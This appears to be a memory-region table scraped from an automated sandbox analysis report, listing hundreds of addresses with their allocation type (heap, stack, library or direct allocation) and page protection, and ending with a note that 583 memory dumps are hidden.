1BBFA03D000
|
heap
|
page read and write
|
||
|
7A00000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
7FFAAC1F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC1D0000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9E7C000
|
heap
|
page read and write
|
||
|
1FACD18E000
|
heap
|
page read and write
|
||
|
1BBF9E71000
|
heap
|
page read and write
|
||
|
7FFAAC170000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
B1B3000
|
direct allocation
|
page execute and read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
8830000
|
heap
|
page read and write
|
||
|
6FDE000
|
stack
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1BBF9FD2000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1BBF9FC2000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
4C21000
|
trusted library allocation
|
page read and write
|
||
|
1FACF48B000
|
trusted library allocation
|
page read and write
|
||
|
8460000
|
heap
|
page read and write
|
||
|
1BBF9FD2000
|
heap
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
2BBC000
|
stack
|
page read and write
|
||
|
435DF83000
|
stack
|
page read and write
|
||
|
1FACD1A4000
|
heap
|
page read and write
|
||
|
1BBFA465000
|
heap
|
page read and write
|
||
|
1FADEEE4000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9E77000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBF9F85000
|
heap
|
page read and write
|
||
|
1FACD080000
|
heap
|
page read and write
|
||
|
7FFAAC160000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1FACF0AC000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9E98000
|
heap
|
page read and write
|
||
|
7FFAAC270000
|
trusted library allocation
|
page read and write
|
||
|
1FACEBA0000
|
heap
|
page execute and read and write
|
||
|
7FFAAC150000
|
trusted library allocation
|
page read and write
|
||
|
1FAE71F4000
|
heap
|
page read and write
|
||
|
1FAE7060000
|
heap
|
page read and write
|
||
|
1C5FEFD000
|
stack
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page read and write
|
||
|
5C82000
|
trusted library allocation
|
page read and write
|
||
|
2BF9000
|
stack
|
page read and write
|
||
|
1FACD1CC000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
319E000
|
stack
|
page read and write
|
||
|
1FACEC01000
|
trusted library allocation
|
page read and write
|
||
|
1BBF816E000
|
heap
|
page read and write
|
||
|
4A70000
|
heap
|
page readonly
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
BBB3000
|
direct allocation
|
page execute and read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
7FFAAC0FA000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA465000
|
heap
|
page read and write
|
||
|
1FACD18C000
|
heap
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
3026000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page execute and read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBF9E98000
|
heap
|
page read and write
|
||
|
499D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BBF9FA5000
|
heap
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
8B30000
|
direct allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBF9FE0000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
1FACEB35000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
77DB000
|
heap
|
page read and write
|
||
|
7FFB22805000
|
unkown
|
page readonly
|
||
|
884E000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
7DF452F80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
87AC000
|
stack
|
page read and write
|
||
|
1BBF9FE3000
|
heap
|
page read and write
|
||
|
1FACD188000
|
heap
|
page read and write
|
||
|
339C000
|
heap
|
page read and write
|
||
|
4BCE000
|
stack
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBF9FE3000
|
heap
|
page read and write
|
||
|
7F150000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC290000
|
trusted library allocation
|
page read and write
|
||
|
36E0000
|
heap
|
page read and write
|
||
|
7FFAAC140000
|
trusted library allocation
|
page read and write
|
||
|
7860000
|
heap
|
page execute and read and write
|
||
|
1FACF0B5000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1FAE732E000
|
heap
|
page read and write
|
||
|
2F68000
|
heap
|
page read and write
|
||
|
19B1CC9D000
|
heap
|
page read and write
|
||
|
7878000
|
trusted library allocation
|
page read and write
|
||
|
1FACD260000
|
trusted library allocation
|
page read and write
|
||
|
882D000
|
stack
|
page read and write
|
||
|
8605000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBF8250000
|
remote allocation
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
31C0000
|
trusted library section
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
19B1D000000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
76F1000
|
heap
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1FAE7345000
|
heap
|
page read and write
|
||
|
1BBF9FE3000
|
heap
|
page read and write
|
||
|
7800000
|
trusted library allocation
|
page read and write
|
||
|
8500000
|
heap
|
page read and write
|
||
|
1BBF9FBF000
|
heap
|
page read and write
|
||
|
799E000
|
stack
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
1BBF9E98000
|
heap
|
page read and write
|
||
|
1FACEB00000
|
heap
|
page execute and read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1FACEA90000
|
trusted library allocation
|
page read and write
|
||
|
751F000
|
stack
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
1BBF9FC2000
|
heap
|
page read and write
|
||
|
1FACF0EE000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1BBF9E93000
|
heap
|
page read and write
|
||
|
72AC000
|
stack
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
435CBEF000
|
stack
|
page read and write
|
||
|
1BBF9E80000
|
heap
|
page read and write
|
||
|
A7B3000
|
direct allocation
|
page execute and read and write
|
||
|
32C0000
|
heap
|
page read and write
|
||
|
1BBF9E71000
|
heap
|
page read and write
|
||
|
1FADEC21000
|
trusted library allocation
|
page read and write
|
||
|
530E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2B0000
|
trusted library allocation
|
page read and write
|
||
|
705E000
|
stack
|
page read and write
|
||
|
435CF7E000
|
stack
|
page read and write
|
||
|
4AA8000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
435D0FE000
|
stack
|
page read and write
|
||
|
795F000
|
stack
|
page read and write
|
||
|
1FAE7367000
|
heap
|
page read and write
|
||
|
1BBF9FF0000
|
heap
|
page read and write
|
||
|
1FAE72D0000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC122000
|
trusted library allocation
|
page read and write
|
||
|
19B1D005000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1FACD2E0000
|
heap
|
page read and write
|
||
|
49A0000
|
trusted library allocation
|
page read and write
|
||
|
1FACF0D9000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1BBF9FC1000
|
heap
|
page read and write
|
||
|
1FAE7112000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
435D4FF000
|
stack
|
page read and write
|
||
|
1FAD09F6000
|
trusted library allocation
|
page read and write
|
||
|
435D47E000
|
stack
|
page read and write
|
||
|
7FFAAC026000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
8490000
|
trusted library allocation
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
6EC21000
|
unkown
|
page execute read
|
||
|
722E000
|
stack
|
page read and write
|
||
|
1FACD120000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9E71000
|
heap
|
page read and write
|
||
|
8857000
|
heap
|
page read and write
|
||
|
1FAD068A000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBFA03A000
|
heap
|
page read and write
|
||
|
77F0000
|
trusted library allocation
|
page read and write
|
||
|
886F000
|
heap
|
page read and write
|
||
|
49B0000
|
trusted library allocation
|
page read and write
|
||
|
1FACEB23000
|
trusted library allocation
|
page read and write
|
||
|
8AED000
|
stack
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
7FFAAC180000
|
trusted library allocation
|
page read and write
|
||
|
74DE000
|
stack
|
page read and write
|
||
|
2FAB000
|
heap
|
page read and write
|
||
|
876D000
|
stack
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
4C05000
|
heap
|
page execute and read and write
|
||
|
1FACD110000
|
trusted library section
|
page read and write
|
||
|
1FACFF39000
|
trusted library allocation
|
page read and write
|
||
|
791E000
|
stack
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
7FFAAC1B0000
|
trusted library allocation
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FC4000
|
heap
|
page read and write
|
||
|
1BBF817B000
|
heap
|
page read and write
|
||
|
7FFAABF43000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC000000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
6EC36000
|
unkown
|
page readonly
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBF9FC4000
|
heap
|
page read and write
|
||
|
435D37C000
|
stack
|
page read and write
|
||
|
1BBF9FF9000
|
heap
|
page read and write
|
||
|
7FFAAC0F1000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1FACD2B0000
|
heap
|
page execute and read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1FAE72FE000
|
heap
|
page read and write
|
||
|
7850000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
7FFAAC260000
|
trusted library allocation
|
page read and write
|
||
|
52E9000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FE3000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
84FE000
|
stack
|
page read and write
|
||
|
7FFAABF5B000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
8480000
|
trusted library allocation
|
page read and write
|
||
|
1FACCFA0000
|
heap
|
page read and write
|
||
|
1BBF81DA000
|
heap
|
page read and write
|
||
|
7FFAAC110000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BBF8278000
|
heap
|
page read and write
|
||
|
86EC000
|
stack
|
page read and write
|
||
|
1BBFA34B000
|
heap
|
page read and write
|
||
|
8A60000
|
trusted library allocation
|
page read and write
|
||
|
7ACC000
|
stack
|
page read and write
|
||
|
78DE000
|
stack
|
page read and write
|
||
|
1BBFA01D000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1FAD0A1C000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
7FFAABFF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC280000
|
trusted library allocation
|
page read and write
|
||
|
1FACFE8B000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
7FFAABF4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
93B3000
|
direct allocation
|
page execute and read and write
|
||
|
1BBF9E98000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
5EC6000
|
trusted library allocation
|
page read and write
|
||
|
435D2F8000
|
stack
|
page read and write
|
||
|
8A40000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
759F000
|
stack
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
1BBFA0CA000
|
heap
|
page read and write
|
||
|
1BBF9FA5000
|
heap
|
page read and write
|
||
|
1BBF9E98000
|
heap
|
page read and write
|
||
|
19B1CE60000
|
heap
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
2FD2000
|
heap
|
page read and write
|
||
|
755E000
|
stack
|
page read and write
|
||
|
1FACF2EF000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
1FADEC10000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
7FFB227E0000
|
unkown
|
page readonly
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
8580000
|
trusted library allocation
|
page read and write
|
||
|
19B1CE80000
|
heap
|
page read and write
|
||
|
771C000
|
heap
|
page read and write
|
||
|
1BBF9E98000
|
heap
|
page read and write
|
||
|
8470000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
7FFAAC2A0000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
1BBF9FC2000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
435DFCE000
|
stack
|
page read and write
|
||
|
19B1D004000
|
heap
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
435D17E000
|
stack
|
page read and write
|
||
|
435CFFC000
|
stack
|
page read and write
|
||
|
6EC3F000
|
unkown
|
page readonly
|
||
|
7FFAAC200000
|
trusted library allocation
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
1FAD0A05000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC1A0000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1FAE71F0000
|
heap
|
page read and write
|
||
|
8A50000
|
trusted library allocation
|
page read and write
|
||
|
1FACF12B000
|
trusted library allocation
|
page read and write
|
||
|
1FAD0BA1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC190000
|
trusted library allocation
|
page read and write
|
||
|
5C31000
|
trusted library allocation
|
page read and write
|
||
|
4A90000
|
heap
|
page read and write
|
||
|
7FFAAC1C0000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
315D000
|
stack
|
page read and write
|
||
|
4994000
|
trusted library allocation
|
page read and write
|
||
|
435D277000
|
stack
|
page read and write
|
||
|
435E14B000
|
stack
|
page read and write
|
||
|
1BBF9FBF000
|
heap
|
page read and write
|
||
|
1FAE70C1000
|
heap
|
page read and write
|
||
|
1FAD09DE000
|
trusted library allocation
|
page read and write
|
||
|
1FACD14C000
|
heap
|
page read and write
|
||
|
1BBF9F99000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
73B8000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1FAD0A01000
|
trusted library allocation
|
page read and write
|
||
|
1FACD0E0000
|
heap
|
page read and write
|
||
|
1BBF817B000
|
heap
|
page read and write
|
||
|
1FAD09F8000
|
trusted library allocation
|
page read and write
|
||
|
1FACD184000
|
heap
|
page read and write
|
||
|
1FACF0C0000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
435D5FB000
|
stack
|
page read and write
|
||
|
1BBF8250000
|
remote allocation
|
page read and write
|
||
|
7FFAAC240000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
2FDF000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
8457000
|
stack
|
page read and write
|
||
|
1FACEBA7000
|
heap
|
page execute and read and write
|
||
|
311E000
|
stack
|
page read and write
|
||
|
1FACEB30000
|
heap
|
page read and write
|
||
|
19B1CC60000
|
heap
|
page read and write
|
||
|
79DD000
|
stack
|
page read and write
|
||
|
1BBF81DC000
|
heap
|
page read and write
|
||
|
1BBF9FD2000
|
heap
|
page read and write
|
||
|
1BBF9E97000
|
heap
|
page read and write
|
||
|
726A000
|
stack
|
page read and write
|
||
|
1BBFA09D000
|
heap
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
1BBFA465000
|
heap
|
page read and write
|
||
|
1FAE711C000
|
heap
|
page read and write
|
||
|
1FACEE26000
|
trusted library allocation
|
page read and write
|
||
|
77D7000
|
heap
|
page read and write
|
||
|
2F90000
|
trusted library section
|
page read and write
|
||
|
49E0000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
701E000
|
stack
|
page read and write
|
||
|
1FAD04BA000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
5C49000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1FACD250000
|
heap
|
page readonly
|
||
|
1FADEEF3000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA091000
|
heap
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
6F9E000
|
stack
|
page read and write
|
||
|
1BBF9E90000
|
heap
|
page read and write
|
||
|
1FAD0C7F000
|
trusted library allocation
|
page read and write
|
||
|
435D57E000
|
stack
|
page read and write
|
||
|
1FAE7320000
|
heap
|
page read and write
|
||
|
8AF0000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
7FFAAC210000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FE0000
|
heap
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
4A6E000
|
stack
|
page read and write
|
||
|
784D000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC1E0000
|
trusted library allocation
|
page read and write
|
||
|
7701000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
52D3000
|
trusted library allocation
|
page read and write
|
||
|
4D77000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC230000
|
trusted library allocation
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
1FACEC85000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC100000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAABF50000
|
trusted library allocation
|
page read and write
|
||
|
1FACEB20000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
1FAD0A09000
|
trusted library allocation
|
page read and write
|
||
|
1BBF827A000
|
heap
|
page read and write
|
||
|
49C5000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB227E1000
|
unkown
|
page execute read
|
||
|
4C82000
|
trusted library allocation
|
page read and write
|
||
|
1FACEB37000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
5C21000
|
trusted library allocation
|
page read and write
|
||
|
7FFB22800000
|
unkown
|
page read and write
|
||
|
1FAD0A38000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
19B1CC9B000
|
heap
|
page read and write
|
||
|
1BBF9E88000
|
heap
|
page read and write
|
||
|
1FAE6C0F000
|
heap
|
page read and write
|
||
|
333E000
|
unkown
|
page read and write
|
||
|
1FACD100000
|
trusted library section
|
page read and write
|
||
|
1BBF9F98000
|
heap
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1FAD0A8C000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
1BBF9FA5000
|
heap
|
page read and write
|
||
|
1FACF0C8000
|
trusted library allocation
|
page read and write
|
||
|
435E0CB000
|
stack
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
872C000
|
stack
|
page read and write
|
||
|
4B3E000
|
stack
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
8510000
|
heap
|
page read and write
|
||
|
7FFAABFFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B80000
|
heap
|
page execute and read and write
|
||
|
1BBF9FC4000
|
heap
|
page read and write
|
||
|
1FACEAC0000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FE0000
|
heap
|
page read and write
|
||
|
77BD000
|
heap
|
page read and write
|
There are 583 hidden memdumps, click here to show them.